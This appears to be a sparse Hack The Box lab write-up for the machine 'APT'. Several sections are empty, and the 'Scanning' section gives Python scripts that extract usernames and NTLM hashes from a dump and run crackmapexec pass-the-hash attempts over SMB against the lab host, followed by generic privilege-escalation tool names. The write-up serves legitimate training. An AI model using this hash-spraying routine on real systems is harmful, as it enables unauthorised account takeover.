Hack The Box — APT

What will we do?

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

1. Information Gathering

2. Scanning

    # Get all usernames into a separate list (deduplicated, first-seen order)
    names = []
    with open("hashes.txt", "r") as lines:
        for line in lines:
            name = line.strip().split(":")[0]
            if name and name not in names:
                names.append(name)
    for name in names:
        print(name)

    # Get all hashes: prefer field 3, fall back to field 2 when field 3 is empty
    with open("hashes.txt", "r") as lines:
        for line in lines:
            pass_hash = line.strip().split(":")
            if len(pass_hash) < 4:
                continue  # skip blank or malformed lines
            first = pass_hash[3]
            second = pass_hash[2]
            if first:
                print(first)
            else:
                print(second)

    # Try each hash with the user at the same position in the list
    import subprocess

    users = ["henry.vinson", "APT$", "Administrator"]
    with open("hashed_passwords.txt", "r") as hashes:
        for user, hhash in zip(users, hashes):
            hhash = hhash.strip()  # drop the trailing newline read from the file
            print("[====[" + user + "]====]")
            # Argument list instead of a shell string, so "$" in APT$ and the
            # hash text reach crackmapexec literally
            subprocess.call(["crackmapexec", "--verbose", "smb", "apt.htb",
                             "-u", user, "-H", hhash])

3. Gaining Access

4. Maintaining Access

  1. Enumerate the directories and files for any leaked data
  2. Use Exploit-Suggester tools to discover the kernel vulnerabilities
  3. Use automation tools to perform multiple tasks like linPEAS or linenum
  4. Use PsPy to watch the executed processes and note any process that can lead me to the root flag

Congrats ❤

Stay in touch


Offensive Security Enthusiast — twitter @eslam3kll

Eslam Akl
